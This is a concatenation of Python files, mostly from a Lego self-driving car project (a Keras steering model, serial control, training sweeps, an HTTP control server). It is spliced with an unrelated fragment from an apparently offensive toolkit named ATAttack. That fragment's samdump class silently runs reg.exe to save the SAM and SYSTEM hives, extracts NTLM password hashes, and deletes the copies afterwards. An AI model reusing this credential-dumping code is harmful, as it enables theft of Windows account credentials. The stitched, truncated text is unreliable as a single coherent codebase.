    model = tf.keras.Sequential([
        Conv2D(10, 3, 3, activation=tf.nn.sigmoid),
        Flatten(),
        Dense(50, activation=tf.nn.sigmoid),
        Dense(15, activation=tf.nn.sigmoid)
    ])
    model.compile('adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
def main():
    """Drive the car: read camera frames, run the steering model, and write
    steering/motor commands to the serial device at /dev/ttyACM0."""
    #train()
    parser = argparse.ArgumentParser(description='Controls a lego car autonomously.')
    parser.add_argument('-r', '--record', help='The directory in which the replay is to be stored')
    parser.add_argument('--show', help='Opens a windows that shows what the car sees', action='store_true')
    parser.add_argument('model')
    parser.add_argument('--linear', help='Needed if the model loaded is linear and it\'s weights are stored.', action='store_true')
    args = parser.parse_args()
    rec = None
    if args.record is not None:
        rec = Recorder(args.record)
    fd = os.open("/dev/ttyACM0", os.O_WRONLY|os.O_SYNC)
    cap = cv2.VideoCapture(0)
    try:
        # Either a full saved model, or bare weights for a known architecture.
        model = tf.keras.models.load_model(args.model)
    except:
        model = get_model(linear=args.linear)
        model.load_weights(args.model)
    first_run = True
    while True:
        input_shape = model.layers[0].input_shape
        rows = None
        # Flattened-input (legacy) models store rows*30 in input_shape[1];
        # conv models store the row count directly.
        if input_shape[1] > 30:
            rows = int(input_shape[1]/30)
        else:
            rows = input_shape[1]
        ret, frame = cap.read()
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        proper = cv2.resize(gray, (30, 30))
        vec = proc_img(proper, rows_removed=30-rows)
        if rec is not None:
            rec.store(vec.reshape(22,30)*255)  # NOTE(review): hard-codes 22 rows; breaks if rows != 22 — confirm
        if args.show:
            cv2.imshow('wind', vec.reshape(rows,30))
        raw_prediction = None
        if input_shape[1] > 30: # If the model expects a flattened out image. needed for backwards compatibility
            raw_prediction = model.predict(vec.reshape(1,rows*30))
        else:
            m = np.array(vec)
            raw_prediction = model.predict(m.reshape((1, rows, 30, 1)))
        prediction = None
        (_,c) = raw_prediction.shape
        if c == 1:
            # Regression head: round to the nearest steering position.
            prediction = np.round(raw_prediction, 0)
        else:
            # Classification head: argmax shifted to the 1-based command range.
            prediction = np.argmax(raw_prediction,axis=1)[0]
            prediction += 1
        print(prediction)
        if first_run:
            # Command 17 switches the drive motor on (see Car.motor).
            os.write(fd, bytes(str(17)+"\x0a\x0d", 'ASCII'))
            first_run=False
        os.write(fd, bytes(str(prediction)+"\x0a\x0d", 'ASCII'))
        cv2.waitKey(30)
    # NOTE(review): unreachable — the while True above has no break.
    if args.show:
        cv2.destroyAllWindows()
if __name__ == "__main__":
    main()  # CLI entry point
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import termios
import os
class Car:
    """Serial interface to the lego car on /dev/ttyACM0 (or /dev/ttyACM1).

    Line protocol: each written line is one command — steering positions
    1..15 (8 = center), 16 = motor off, 17 = motor on.
    """

    def __init__(self):
        # os.open raises OSError on failure — it never returns -1 in Python,
        # so the original `if fd == -1` fallback was dead code. Try the
        # second device in an except block instead.
        try:
            fd = os.open("/dev/ttyACM0", os.O_RDWR)
        except OSError:
            try:
                fd = os.open("/dev/ttyACM1", os.O_RDWR)
            except OSError:
                # NameError kept for backward compatibility with callers.
                raise NameError("Error opening terminal device")
        attr = termios.tcgetattr(fd)
        # Disable output post-processing so bytes go out unmodified.
        # NOTE(review): attr[1] is the oflag; baud is normally set via the
        # ispeed/ospeed fields (attr[4]/attr[5]) — confirm on hardware.
        attr[1] = attr[1] & ~(termios.OPOST | termios.ONLCR | termios.CBAUD)
        attr[1] |= termios.B9600
        termios.tcsetattr(fd, termios.TCSAFLUSH, attr)
        self.is_on = False   # motor state
        self.position = 8    # current steering position (8 = center)
        self.file = os.fdopen(fd, "w")
        self.file.write("16\n")  # start with the motor switched off

    def turn(self, new_pos):
        """Steer to `new_pos` and remember it."""
        self.file.write(str(new_pos)+"\n")
        self.position = new_pos

    def motor(self, on):
        """Switch the drive motor on (command 17) or off (command 16)."""
        if on:
            self.file.write("17\n")
            self.is_on = True
        else:
            self.file.write("16\n")
            self.is_on = False
--- FILE SEPARATOR ---
#!/usr/bin/env python3
from trainer import *
import matplotlib.pyplot as plt
import tensorflow as tf
epochs = [1200, 600, 400, 300]
rows_removed = 12
def experiment_classification():
    """Sweep L1/L2 regularization strengths for the classification model on
    growing subsets of recorded rounds; checkpoints the best weights per
    run and saves one val_accuracy figure per subset size."""
    for i in range(4):
        # Train on rounds 1..i+1 to measure the effect of additional data.
        directories = ['data/manual_round'+str(k) for k in range(1, i+2)]
        imgs, positions = load_imgs(directories)
        imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
        (n, r, c) = np.shape(imgs)
        imgs = np.reshape(imgs, (n, r, c, 1))
        # Regularization sweep: 1e-6 * 5**x for x in 0..4.
        regs = [round(0.000001*(5**x), 7) for x in range(5)]
        models = [ get_model(reg=reg) for reg in regs]
        positions = to_categorical(positions, num_classes=15)
        cbs = [
            tf.keras.callbacks.ModelCheckpoint(
                filepath='experiments/class'+str(i+1)+'/r'+str(reg)+"/check",
                save_weights_only=True,
                monitor='val_accuracy',
                mode='max',
                save_best_only=True) for reg in regs
        ]
        hists = []
        for (model, cb) in zip(iter(models),iter(cbs)):
            hists.append(model.fit(imgs, positions, batch_size=50, epochs=epochs[i], validation_split=0.2, callbacks=[cb]))
        # Overlay every run's validation accuracy on one figure.
        for c in range(len(hists)):
            hist = hists[c]
            plt.ylabel('val_accuracy')
            plt.xlabel('epochs')
            plt.plot(hist.history['val_accuracy'])
        plt.legend(['reg={}'.format(r) for r in regs])
        plt.savefig('experiments/class'+str(i+1)+'/Figure_1.png')
        plt.clf()
def experiment_linear():
    """Same regularization sweep as experiment_classification but for the
    linear model, checkpointing on minimum val_loss and plotting val_loss.
    Note: range(1) means only the first round subset is run."""
    for i in range(1):
        directories = ['data/manual_round'+str(k) for k in range(1, i+2)]
        imgs, positions = load_imgs(directories)
        imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
        (n, r, c) = np.shape(imgs)
        imgs = np.reshape(imgs, (n, r, c, 1))
        # Regularization sweep: 1e-6 * 5**x for x in 0..4.
        regs = [round(0.000001*(5**x), 7) for x in range(5)]
        models = [ get_model(reg=reg, linear=True) for reg in regs]
        cbs = [
            tf.keras.callbacks.ModelCheckpoint(
                filepath='experiments/linear'+str(i+1)+'/r'+str(reg)+"/check",
                save_weights_only=True,
                monitor='val_loss',
                mode='min',
                save_best_only=True) for reg in regs
        ]
        hists = []
        for (model, cb) in zip(iter(models),iter(cbs)):
            hists.append(model.fit(imgs, positions, batch_size=50, epochs=epochs[i], validation_split=0.2, callbacks=[cb]))
        # Overlay every run's validation loss on one figure.
        for c in range(len(hists)):
            hist = hists[c]
            plt.ylabel('loss')
            plt.xlabel('epochs')
            plt.plot(hist.history['val_loss'])
        plt.legend(['reg={}'.format(r) for r in regs])
        plt.savefig('experiments/linear'+str(i+1)+'/Figure_1.png')
        plt.clf()
if __name__ == "__main__":
    # experiment_classification()  — disabled: only the linear sweep runs
    experiment_linear()
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import cv2
import os
import sys
class Recorder:
    """Saves and replays numbered image sequences in a directory.

    Files are named "<iter>.png" or "<iter>_<deg>.png"; numbering continues
    after the highest index already present.
    """
    # directory is a string
    def __init__(self, directory):
        self.directory = directory
        if self.directory[-1] != '/':
            self.directory += '/'
        self.cur_iter = self.get_cur_iter()
    def get_cur_iter(self):
        # Return 1 + the largest numeric prefix among existing files.
        largest_iter = 0
        for filename in os.listdir(self.directory):
            digit = get_file_digit(filename)
            if digit >= largest_iter:
                largest_iter = digit
        return largest_iter+1
    def store(self, image, deg=None): # cv2 image
        # Write `image` as <cur_iter>[_<deg>].png and bump the counter.
        filename = self.directory
        filename += str(self.cur_iter)
        if deg is not None:
            filename += "_"+str(deg)
        filename += ".png"
        cv2.imwrite(filename, image)
        self.cur_iter += 1
    def replay(self):
        # Show the images in numeric order: 'l' steps back one frame,
        # Escape quits, any other key advances.
        filenames = os.listdir(self.directory)
        filenames.sort(key=get_file_digit)
        i = 0
        while i < len(filenames):
            img = cv2.imread(self.directory+filenames[i])
            cv2.imshow('recorder-replay', img)
            print(filenames[i])
            k = cv2.waitKey(0)
            print(k)
            if k == 108: # l
                i = i-2  # net effect with the i+1 below: go back one frame
            if k == 27: # escape
                break
            i = i+1
        cv2.destroyWindow('recorder-replay')
def get_file_digit(filename):
    """Return the leading integer index of a recorder frame filename.

    Handles both '<n>.png' and '<n>_<deg>.png' forms.
    Bug fixed: str.find returns -1 when the separator is missing, never None,
    so the original no-underscore branch was unreachable and names like
    '7.png' raised ValueError (int of a slice ending at index -1).
    """
    idx = filename.find('_')
    if idx == -1:
        # No underscore: digits run up to the extension dot.
        idx = filename.find('.')
    return int(filename[0:idx])
def main():
    """Replay the recording directory given as the first CLI argument."""
    # argv[1]: path to a directory of recorded frames
    print(sys.argv[1])
    rec = Recorder(sys.argv[1])
    rec.replay()
if __name__ == '__main__':
    main()
--- FILE SEPARATOR ---
#!/usr/bin/env python3
from trainer import *
from argparse import ArgumentParser
# Run on ~/data/autocar-round-5 to obtain the values reported in the thesis.
if __name__ == "__main__":
    parser = ArgumentParser('Finds the standard deviation from a model given the input images.')
    parser.add_argument('-m', '--model', help='The model that is to be evaluated.')
    parser.add_argument('directories', nargs='+', help='The directories in which the images are.')
    parser.add_argument('--linear', action='store_true', help='Needed if the model to be evaluated is linear.')
    args = parser.parse_args()
    # Load a full saved model if possible; otherwise rebuild the architecture
    # and load only the weights (checkpoints store weights only).
    # (Was a bare `except:` that also swallowed KeyboardInterrupt/SystemExit,
    # preceded by a dead `model = get_model(...)` that was always overwritten.)
    try:
        model = tf.keras.models.load_model(args.model)
    except Exception:
        model = get_model(linear=args.linear)
        model.load_weights(args.model)
    imgs, positions = load_imgs(args.directories)
    imgs = pre_proc(imgs, rows_removed=12, break_point=0.5)
    (n, r, c) = np.shape(imgs)
    imgs = np.reshape(imgs, (n, r, c, 1))
    # Spread of the human-recorded steering labels, for comparison below.
    train_sd = np.std(positions)
    if not args.linear:
        positions = to_categorical(positions, num_classes=15)
    preds = []
    for i in range(n):
        # Use the actual (r, c) computed above instead of hard-coding (18, 30).
        raw_prediction = model(imgs[i].reshape((1, r, c, 1)))
        _,c2 = raw_prediction.shape
        if c2==1:
            # Linear head: round the single continuous output to a class.
            prediction = np.round(raw_prediction)
        else:
            # Classifier head: take the argmax over the 15 classes.
            prediction = np.argmax(raw_prediction)
        preds.append(prediction)
    preds = np.array(preds)
    mean = np.mean(preds)
    sd = np.std(preds)
    # Printed in order: label std dev, prediction mean, prediction std dev.
    print(train_sd)
    print(mean)
    print(sd)
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import os
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
"""
from flask import Flask
from flask import (
Blueprint, flash, g, redirect, render_template, request, session, url_for
)"""
from threading import Thread, Lock
import threading
from multiprocessing import Process, Pipe
import tensorflow as tf
import trainer
import numpy as np
import argparse
from recorder import Recorder
from car import Car
import cv2
# Shared mutable state between the HTTP server thread, the camera thread and
# the main control loop.
lock = Lock()  # guards deg and motor_status
deg = 8  # requested servo position; presumably 1..15 with 8 near center -- TODO confirm
motor_status = False  # True while the drive motor should run
car = Car()  # hardware interface to steering servo and motor (project-local)
img_lock = Lock()  # guards cur_img
cur_img = None  # latest camera frame, written by camera_reader
def camera_reader():
    """Continuously grab frames from camera 0 into the shared cur_img buffer.

    Runs forever; intended to be started on its own thread. Writers and
    readers of cur_img coordinate through img_lock.
    """
    global img_lock, cur_img
    capture = cv2.VideoCapture(0)
    while True:
        _, grabbed = capture.read()
        with img_lock:
            cur_img = grabbed
def autonomous_driver_server(conn, model_file_name=None, linear=False):
    """Prediction worker: receive images on conn, reply with a steering position.

    Loads a full saved model when possible, otherwise rebuilds the
    architecture and loads only the weights. Runs forever; replies 8
    (the neutral position) when sent None. Returns immediately if no model
    file is given.
    (Fixed: the bare `except:` also swallowed KeyboardInterrupt/SystemExit.)
    """
    if model_file_name is None:
        return
    try:
        model = tf.keras.models.load_model(model_file_name)
    except Exception:
        # Checkpoint files store weights only; rebuild the net first.
        model = trainer.get_model(linear=linear)
        model.load_weights(model_file_name)
    while True:
        img = conn.recv()
        if img is None:
            conn.send(8)  # neutral/default steering position
            continue
        img = np.array(img)
        # Crop the 30x30 camera image to however many rows the model expects.
        input_shape = model.layers[0].input_shape
        rows = input_shape[1]
        processed_img = trainer.proc_img(img, rows_removed=30-rows, break_point=0.5)
        m = np.array(processed_img)
        raw_prediction = model.predict(m.reshape((1, rows, 30, 1)))
        (_,c) = raw_prediction.shape
        if c == 1:
            # Linear head: single continuous output, rounded to a class.
            prediction = np.round(raw_prediction, 0)
        else:
            # Classifier head: argmax over the 15 classes.
            prediction = np.argmax(raw_prediction,axis=1)[0]
        # Training labels are 0-based; servo positions are 1-based.
        prediction += 1
        conn.send(prediction)
def car_controller(predictor_conn, alternating_autonomous=False, record_dir="replays/test"):
    """Main control loop: steer the car from human input or the model.

    predictor_conn: Pipe endpoint to the prediction process
        (autonomous_driver_server).
    alternating_autonomous: when truthy, toggle between human and model
        control every seconds_between_switch seconds (DAgger-style
        data collection).
    record_dir: directory where (image, steering) frames are recorded.
    Runs forever. Shares deg/motor_status (under `lock`) with the HTTP
    server and cur_img (under `img_lock`) with the camera thread.
    """
    global img_lock, lock, car
    # how many seconds it takes before it switches between being controlled by model and human.
    seconds_between_switch = 1.0
    # when it is controlled by the model it should not record any images.
    # how often an image and degree is to be stored.
    seconds_between_capture = 0.2
    rec = Recorder(record_dir)
    tlast_switch = time.time()
    tlast_capture = time.time()
    currently_autonomous = False
    while True:
        time.sleep(0.01)
        # Periodically toggle who is driving (only in alternating mode).
        if (time.time()-tlast_switch) > seconds_between_switch and alternating_autonomous:
            tlast_switch = time.time()
            currently_autonomous = not currently_autonomous
        # Snapshot the newest camera frame as a 30x30 grayscale image.
        img_lock.acquire()
        if cur_img is None:
            img_lock.release()
            print("continue")
            continue
        gray = cv2.cvtColor(cur_img, cv2.COLOR_BGR2GRAY)
        img = cv2.resize(gray, (30,30))
        img_lock.release()
        lock.acquire()
        local_motor_status = motor_status
        if not currently_autonomous:
            # Human mode: use the steering/motor state set by the HTTP server.
            local_deg = deg
            #print("human "+str(deg))
            car.motor(motor_status)
            local_motor_status = motor_status
        else:
            # Autonomous mode: ask the predictor process for a steering position.
            # NOTE(review): `lock` stays held during this round-trip -- the HTTP
            # handlers block until the prediction returns; confirm intended.
            predictor_conn.send(img)
            pred = predictor_conn.recv()
            #print("predicted "+str(pred))
            local_deg = pred
        car.turn(local_deg)
        # Record at most one frame per capture interval, and only while the
        # motor is running (avoids recording stationary frames).
        if (time.time()-tlast_capture) > seconds_between_capture and local_motor_status:
            tlast_capture = time.time()
            rec.store(img, deg=local_deg)
        if currently_autonomous:
            print("auto "+str(local_deg))
        else:
            print("human "+str(local_deg))
        lock.release()
class Server(BaseHTTPRequestHandler):
    """HTTP control interface for the car.

    GET serves static files from templates/ ('' and favicon.ico map to
    index.html). POST updates the shared steering (`deg`) and motor state
    under the module-level lock.
    """

    def do_GET(self):
        """Serve the requested file from the templates/ directory."""
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        path = self.path
        path = path[1:]
        if path == '' or path=='favicon.ico':
            path = "index.html"
        path = "templates/"+path
        # Context manager closes the file even if the socket write fails
        # (the original leaked the file handle).
        with open(path, "r") as f:
            data = f.read()
        self.wfile.write(bytes(data, "utf8"))

    def do_POST(self):
        """Update `deg` (/servo, from a 0..1 float) or `motor_status` (/motor)."""
        global lock, deg, motor_status
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        print(data)
        if data == b'0':
            return
        # `with lock` guarantees release even if float(data) raises
        # (the original could leave the lock held forever on bad input).
        with lock:
            if self.path == '/servo':
                # Map the 0..1 slider value onto servo positions 1..15.
                f = float(data)
                deg = round(f*14.0)+1
            elif self.path == '/motor':
                motor_status = (data != b'false')
def server_thread():
    """Run the control HTTP server on 0.0.0.0:5000 until interrupted."""
    bind_host = "0.0.0.0"
    bind_port = 5000
    httpd = HTTPServer((bind_host, bind_port), Server)
    print("Server started http://%s:%s" % (bind_host, bind_port))
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print("Server stopped.")
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # --dagger: path to a trained model; also enables alternating human/model
    # control (DAgger-style data collection).
    parser.add_argument('--dagger')
    # --savedir: directory where (image, steering) frames are recorded.
    parser.add_argument('--savedir', '-d')
    parser.add_argument('--linear', action='store_true')
    args = parser.parse_args()
    # Prediction runs in a separate process over a Pipe so model inference
    # does not block the control loop.
    parent_conn, child_conn = Pipe()
    predictor = Process(target=autonomous_driver_server, args=(child_conn, args.dagger,args.linear))
    predictor.start()
    # HTTP control UI and camera capture each run on their own thread.
    s = Thread(target=server_thread)
    s.start()
    cr = Thread(target=camera_reader)
    cr.start()
    # NOTE(review): args.dagger is a string (or None); it is used only for
    # truthiness here to enable alternating control -- confirm intended.
    car_controller(parent_conn, alternating_autonomous=args.dagger, record_dir=args.savedir)
    #controller = Thread(target=car_controller, args=(parent_conn,))
    #controller.start()
    #print(controller.ident)
    #predictor.terminate()
    #controller.join()
"""
def SERVER():
app = Flask(__name__)
@app.route('/')
def hello():
return render_template('index.html')
@app.route('/script.js')
def post():
return render_template('script.js')
@app.route('/servo', methods=['POST'])
def pos():
global deg, lock
f = float(request.data)
f = f*14.0
p = round(f)+1
print(p)
lock.acquire()
#car.turn(p)
deg = p
lock.release()
return ''
@app.route('/motor', methods=['POST'])
def motor():
global motor_status, lock
data = request.data
status = False
if data == b'false':
status = False
elif data == b'true':
status = True
lock.acquire()
#car.motor(status)
motor_status = status
lock.release()
return ''
app.run(host='0.0.0.0')
"""
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import tensorflow as tf
import pickle
import os
def preproc_files(srcdir, dstdir):
    """Intended to preprocess every image in srcdir into dstdir.

    NOTE(review): this function is broken as written and appears to be an
    abandoned draft of trainer.py's preproc_files/create_flipped_dataset:
    os.listdir() is called without srcdir, the loop variable is `file` but the
    body uses the undefined `file_name`, and `cv2`, `get_servo_pos`,
    `flipped_label` and `flipped_img` are not defined in this module.
    Calling it raises NameError -- confirm it is dead code before removing.
    """
    for file in os.listdir():
        org_img = cv2.imread(srcdir+"/"+file_name)
        org_label = get_servo_pos(file_name)
        random_str = file_name[0:file_name.find("_")]
        cv2.imwrite(dstdir+"/"+"preproc"+random_str+"_"+str(flipped_label)+".png", flipped_img)
def save_model_weights(model, fname):
    """Pickle model.get_weights() to fname.

    Fixed: the original opened the file (in unnecessary 'wb+' mode) without
    ever closing it, leaking the handle and risking an unflushed file.
    """
    with open(fname, "wb") as f:
        pickle.dump(model.get_weights(), f)
def load_model_weights(model, fname):
    """Load pickled weights from fname and apply them via model.set_weights().

    Fixed: the original opened the file without ever closing it, leaking the
    handle. NOTE: pickle.load on untrusted files can execute arbitrary code;
    only load weight files you created.
    """
    with open(fname, "rb") as f:
        weights = pickle.load(f)
    model.set_weights(weights)
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import numpy as np
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
from tensorflow.keras.regularizers import l2
import matplotlib.pyplot as plt
import os
import cv2
import test
import argparse
def main():
    """CLI training sweep: fit one CNN per L2 regularization value.

    Loads images from the given directories, binarizes and crops them, then
    trains five models (reg = 1e-6 * 5**x, x in 0..4) with best-val_accuracy
    checkpointing under --dst/r<reg>/, and saves the accuracy curves to
    --dst/Figure_1.png.
    """
    parser = argparse.ArgumentParser('trains, creates and evaluates models')
    parser.add_argument('directories', nargs='+', help='the directores in which the training images are.')
    parser.add_argument('--linear', action='store_true')
    parser.add_argument('--dst')
    parser.add_argument('--epochs', type=int, default=300)
    args = parser.parse_args()
    rows_removed = 12
    (imgs, positions) = load_imgs(args.directories)
    #(imgs, positions) = load_imgs('/home/alexander/data/autocar-round-5')
    print(np.shape(positions))
    print(np.shape(imgs))
    imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
    (n, r, c) = np.shape(imgs)
    imgs = np.reshape(imgs, (n, r, c, 1))
    # One model per regularization strength: 1e-6, 5e-6, 2.5e-5, ...
    regs = [round(0.000001*(5**x), 7) for x in range(5)]
    models = [ get_model(reg=reg, linear=args.linear) for reg in regs]
    # Classifier heads (15 outputs) need one-hot labels; the linear head keeps ints.
    if models[0].layers[-1].output_shape[1] != 1:
        positions = to_categorical(positions, num_classes=15)
    print(np.shape(positions))
    print(positions)
    fpath = args.dst
    if fpath[-1] != '/':
        fpath += '/'
    # Checkpoint the best val_accuracy weights separately per reg value.
    cbs = [
        tf.keras.callbacks.ModelCheckpoint(
            filepath=fpath+'r'+str(reg)+"/check",
            save_weights_only=True,
            monitor='val_accuracy',
            mode='max',
            save_best_only=True) for reg in regs
    ]
    hists = []
    for (model, cb) in zip(iter(models),iter(cbs)):
        hists.append(model.fit(imgs, positions, batch_size=50, epochs=args.epochs, validation_split=0.2, callbacks=[cb]))
    # Overlay every model's validation-accuracy curve on one figure.
    for i in range(len(hists)):
        hist = hists[i]
        plt.ylabel('val_accuracy')
        plt.xlabel('epochs')
        plt.plot(hist.history['val_accuracy'])
        plt.legend(['reg={}'.format(r) for r in regs])
        plt.savefig(fpath+'Figure_1.png')
    #test.save_model_weights(models[0], 'wtest')
    """(imgs, positions) = load_imgs('/home/alexander/data/autocar-round-5')
    print(np.shape(positions))
    print(np.shape(imgs))
    imgs = pre_proc(imgs, rows_removed=rows_removed, break_point=0.5)
    (n, r, c) = np.shape(imgs)
    imgs = np.reshape(imgs, (n, r, c, 1))
    positions = to_categorical(positions, num_classes=15)
    #test.load_model_weights()
    for model in models:
        eval = model.evaluate(x=imgs, y=positions)
        print(eval)
    """
    #pred_y = models[0](imgs)
    #m = get_model()
    #test.load_model_weights(m, "wtest")
    """for model in models:
        eval = m.evaluate(x=imgs, y=positions)
        print(eval)
    """
    #tf.keras.models.save_model(models[0], "models/lab/test.HD")
    #models[0]
    #for i in range(len(pred_y)):
    #    print(str(np.round(pred_y[i]))+" "+str(np.round(positions[i])))
    #print(np.shape(imgs[0,:]))
    #print(model.predict(imgs[0,:]))
    #keras.models.save_model(model, 'models/conv10_20.HDF5')
def fit_models(models, x, y, prop_val, epochs=1000, batch_size=30):
    """Fit each model on a fixed train/validation split of (x, y).

    prop_val: fraction (0..1) of samples held out for validation, taken from
    the END of the arrays (no shuffling).
    Returns the list of fit() results (Keras History objects), one per model.
    """
    total = np.shape(x)[0]
    n_val = round(total*prop_val)
    print("n_val="+str(n_val))
    print("n="+str(total))
    split = total - n_val
    train_x, val_x = x[:split], x[split:]
    train_y, val_y = y[:split], y[split:]
    return [
        model.fit(train_x, train_y, validation_data=(val_x, val_y),
                  batch_size=batch_size, epochs=epochs)
        for model in models
    ]
def get_model(reg=0.0, linear=False):
    """Build and compile the small CNN used for steering prediction.

    reg: L2 regularization strength applied to the conv and dense kernels.
    linear: if True, one linear output trained with MSE (regression);
        otherwise a 15-way sigmoid output trained with categorical
        cross-entropy.
    Input shape is the binarized, cropped image (18, 30, 1).
    """
    optimizer = tf.keras.optimizers.SGD(learning_rate=0.03, momentum=0.7)
    model = Sequential()
    # NOTE(review): in tf.keras, Conv2D(10, 3,3) means kernel_size=3 with
    # strides=3; if a 3x3 kernel with stride 1 was intended (old Keras-1
    # style), this should be Conv2D(10, (3, 3)) -- confirm.
    model.add(Conv2D(10, 3,3, activation='sigmoid', input_shape=(18,30,1), kernel_regularizer=l2(reg)))
    model.add(MaxPooling2D(pool_size=(2,2)))
    model.add(Flatten())
    model.add(Dense(20, activation='sigmoid', kernel_regularizer=l2(reg)))
    if linear:
        model.add(Dense(1, activation='linear', kernel_regularizer=l2(reg)))
        model.compile(optimizer=optimizer, loss='mse', metrics=['accuracy'])
    else:
        model.add(Dense(15, activation='sigmoid', kernel_regularizer=l2(reg)))
        model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
    return model
#def get_
def proc_img(img, rows_removed=12, break_point=0.5):
    """Binarize a 30x30 grayscale image and crop off the top rows.

    Pixel values are scaled to [0, 1] and thresholded at break_point
    (1.0 strictly above, 0.0 otherwise); the first rows_removed rows are
    then discarded. Accepts flat or 2-D input; returns a float array of
    shape (30 - rows_removed, 30).
    """
    scaled = img / 255.0
    binary = (scaled > break_point) * 1.0
    cropped = binary.reshape(30, 30)[rows_removed:, :]
    return cropped.reshape(30 - rows_removed, 30)
def pre_proc(data, rows_removed=12, break_point=0.5):
    """Apply proc_img to every image in data.

    Returns a numpy array of shape (n, 30 - rows_removed, 30).
    """
    count = np.shape(data)[0]
    return np.array([
        proc_img(data[idx], rows_removed=rows_removed, break_point=break_point)
        for idx in range(count)
    ])
# positions are an integer in the range [0,15)
def load_imgs(directories):
    """Load grayscale images and their steering labels from directories.

    directories: a single directory path or a list of paths. Labels are
    parsed from the filenames via get_servo_pos and shifted to 0-based.
    Returns (images, positions) as numpy arrays.
    Fixed: the original duplicated the whole loading loop for the
    single-directory case; both cases now share one code path with
    identical results.
    """
    if type(directories) != list:
        directories = [directories]
    data = []
    positions = []
    for directory in directories:
        for filename in os.listdir(directory):
            # 0 flag: read as grayscale
            img = cv2.imread(directory+"/"+filename,0)
            data.append(img)
            positions.append(get_servo_pos(filename)-1)
    return (np.array(data), np.array(positions))
def get_servo_pos(fname):
    """Parse the 1-based servo position from a '<random>_<pos>.<ext>' filename."""
    start = fname.find("_") + 1
    end = fname.find(".")
    return int(fname[start:end])
def show_imgs(X, Y, pred_Y):
    """Step through the rows of X interactively, printing label vs prediction.

    Key handling is delegated to display_example: ESC (27) quits,
    'l' (108) steps one row back, anything else advances.
    """
    total = X.shape[0]
    idx = 0
    while idx < total:
        print(str(Y[idx]) + ", " + str(pred_Y[idx]))
        key = display_example(X[idx])
        if key == 27:
            break
        if key == 108:
            idx -= 2
        idx += 1
def display_example(x):
    """Show one training example with cv2 and return the pressed key code.

    Accepts either a flat vector (reshaped into rows of width 30) or a
    batched 4-D array (1, r, c, 1).
    NOTE(review): a plain 2-D or 3-D input makes the 4-tuple unpacking below
    raise ValueError -- only the flat and 4-D shapes are handled.
    """
    img = x
    r = None
    c = None
    if len(x.shape) == 1:
        l = x.shape
        # flat vector: infer the number of rows from the length
        img = x.reshape(int(l[0]/30),30)
    else:
        (_,r,c,_) = x.shape
    if r != None and r != 1:
        # drop the batch/channel axes for display
        img = x.reshape(r,30)
    cv2.imshow("example", img)
    k = cv2.waitKey(0)
    cv2.destroyWindow("example")
    return k
# Takes every image in srcdir, flips it horizontally and stores it as
# flipped<original random str>_<flipped label>.png in dstdir.
# For example FA54HG_1.png becomes flippedFA54HG_15.png.
def create_flipped_dataset(srcdir, dstdir):
    """Data augmentation: write a horizontally mirrored copy of each labeled image."""
    for file_name in os.listdir(srcdir):
        org_img = cv2.imread(srcdir+"/"+file_name)
        flipped_img = cv2.flip(org_img, 1)
        org_label = get_servo_pos(file_name)
        # steering positions 1..15 are symmetric around 8, so mirror is 16 - label
        flipped_label = 16-org_label
        random_str = file_name[0:file_name.find("_")]
        cv2.imwrite(dstdir+"/"+"flipped"+random_str+"_"+str(flipped_label)+".png", flipped_img)
def preproc_files(srcdir, dstdir):
    """Run proc_img over every image in srcdir and save the binarized result.

    Output name: 'preproc<random str>_<label>.png' (label preserved).
    Pixel values are scaled back to 0/255 for writing.
    """
    for name in os.listdir(srcdir):
        source = cv2.imread(srcdir + "/" + name, 0)
        processed = proc_img(source, rows_removed=12, break_point=0.5)
        label = get_servo_pos(name)
        prefix = name[0:name.find("_")]
        cv2.imwrite(dstdir + "/" + "preproc" + prefix + "_" + str(label) + ".png", processed * 255)
# Allow running the training sweep directly: python trainer.py <dirs...>
if __name__ == '__main__':
    main()
|
[
"/ann.py",
"/car.py",
"/experiment.py",
"/recorder.py",
"/sd.py",
"/server.py",
"/test.py",
"/trainer.py"
] |
02bx/ATAttack
|
#!/usr/bin/python
# coding=utf-8
from ATAttack.framework.win32.hashdump import dump_file_hashes
from ATAttack.framework.constant import constant
import subprocess
import os
try:
import _subprocess as sub
STARTF_USESHOWWINDOW = sub.STARTF_USESHOWWINDOW
SW_HIDE = sub.SW_HIDE
except ImportError:
STARTF_USESHOWWINDOW = subprocess.STARTF_USESHOWWINDOW
SW_HIDE = subprocess.SW_HIDE
class samdump:
def __init__(self):
pass
def save_hives(self):
"""
Save SAM Hives
"""
sammhives = []
try:
for h in constant.hives:
if not os.path.exists(constant.hives[h]):
cmdline = r'reg.exe save hklm\%s %s' % (
h, constant.hives[h])
command = ['cmd.exe', '/c', cmdline]
info = subprocess.STARTUPINFO()
info.dwFlags = STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
p = subprocess.Popen(
command,
startupinfo=info,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
universal_newlines=True)
results, _ = p.communicate()
sammhives.append(constant.hives[h])
ntlm = dump_file_hashes(sammhives[0], sammhives[1])
# lsass_dump()
return ntlm[0]
except BaseException: # Catch all kind of exceptions
pass
finally:
self.delete_hives()
def delete_hives(self):
"""
Delete SAM Hives
"""
# Try to remove all temporary files
for h in constant.hives:
if os.path.exists(constant.hives[h]):
try:
os.remove(constant.hives[h])
except Exception:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding=utf-8
import threading
import subprocess
import Queue
adder = []
queue = Queue.Queue()
